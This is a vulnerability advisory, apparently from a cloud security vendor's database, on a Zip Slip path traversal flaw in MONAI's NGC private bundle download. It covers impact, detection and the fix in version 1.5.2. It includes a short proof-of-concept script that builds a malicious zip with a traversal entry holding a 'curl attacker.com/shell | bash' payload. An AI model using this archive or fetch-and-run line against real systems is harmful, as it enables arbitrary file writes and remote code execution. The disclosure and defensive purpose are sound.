
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-21851 is a Path Traversal (Zip Slip) vulnerability in the MONAI (Medical Open Network for AI) framework's _download_from_ngc_private() function. The function calls zipfile.ZipFile.extractall() without validating archive member paths, allowing a maliciously crafted zip file to write files outside the intended extraction directory. All MONAI versions up to and including 1.5.1 (pip package) are affected; the issue was fixed in version 1.5.2. The vulnerability was disclosed on January 6, 2026, and has a CVSS v3.1 base score of 5.3 (Moderate) (Github Advisory, MONAI Security Advisory).
The root cause is CWE-22 (Improper Limitation of a Pathname to a Restricted Directory): the _download_from_ngc_private() function in monai/bundle/scripts.py (lines 291–292) calls z.extractall(extract_path) directly without validating that archive member paths remain within the target directory. This is an implementation oversight — MONAI already provides a safe_extract_member() function in monai/apps/utils.py that checks for absolute paths and .. traversal sequences, and all other download functions (_download_from_github(), _download_from_monaihosting(), _download_from_bundle_info()) use this safe wrapper. An attacker who controls an NGC private repository can craft a zip archive containing entries with path traversal sequences (e.g., ../../../tmp/malicious_file) that, when extracted by the vulnerable function, write files to arbitrary filesystem locations. Exploitation requires the attacker to control or compromise an NGC private repository, the victim to configure MONAI with source="ngc_private", and user interaction to trigger the download (MONAI Security Advisory, Github Advisory).
Successful exploitation allows an attacker to write arbitrary files to any location on the filesystem accessible to the user running MONAI, limited by the process's OS-level permissions. The primary impact is to integrity — critical system files, configuration files, or application code could be overwritten, or malicious scripts could be planted for later execution. There is no direct confidentiality or availability impact as defined by the CVSS score, but file overwrites could indirectly enable code execution or persistent access depending on the target location and permissions (MONAI Security Advisory, Github Advisory).
A proof-of-concept script is publicly documented in the GitHub security advisory, demonstrating creation of a malicious zip with path traversal entries and the difference in behavior between the vulnerable and safe extraction patterns. However, there is no evidence of active in-the-wild exploitation or threat actor attribution at this time. The EPSS score is approximately 0.013% (2nd percentile), indicating a low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for the attacker to control an NGC private repository and for the victim to use the ngc_private download source (Github Advisory, MONAI Security Advisory).
import zipfile, io
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf:
zf.writestr('monai_test_bundle/configs/metadata.json', '{"name": "test_bundle"}')
zf.writestr('../../../tmp/malicious_payload.sh', '#!/bin/bash\ncurl attacker.com/shell | bash')
with open('malicious_bundle.zip', 'wb') as f:
f.write(zip_buffer.getvalue())source="ngc_private", which calls _download_from_ngc_private() and invokes the vulnerable z.extractall() without path validation.../../../tmp/malicious_payload.sh) is extracted outside the intended directory, writing attacker-controlled content to the target path with the permissions of the MONAI process (MONAI Security Advisory)./tmp, home directories, or system directories) with timestamps coinciding with a MONAI NGC private bundle download; files with names matching bundle artifacts but located in anomalous paths._download_from_ngc_private() activity (log entries such as Downloading: <path>_v<version>.zip and Writing into directory: <extract_path>) followed by unexpected file creation events in unrelated directories.Upgrade MONAI to version 1.5.2 or later, which replaces the unsafe zipfile.ZipFile.extractall() call in _download_from_ngc_private() with the existing _extract_zip() utility that validates member paths before extraction (commit 4014c84) (MONAI Patch Commit, Github Advisory). As a temporary workaround if patching is not immediately possible, avoid using source="ngc_private" for bundle downloads and restrict downloads to trusted, verified sources. Additionally, run MONAI processes with the least-privileged user account to limit the impact of any successful file write.
The vulnerability was reported by researcher yueyueL and analyzed by MONAI maintainer ericspod, who published the security advisory on January 6, 2026. The fix was merged promptly and included in the MONAI 1.5.2 release on January 29, 2026. No significant broader media coverage or notable community controversy has been observed beyond the standard advisory and patch process (MONAI Security Advisory, Github Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."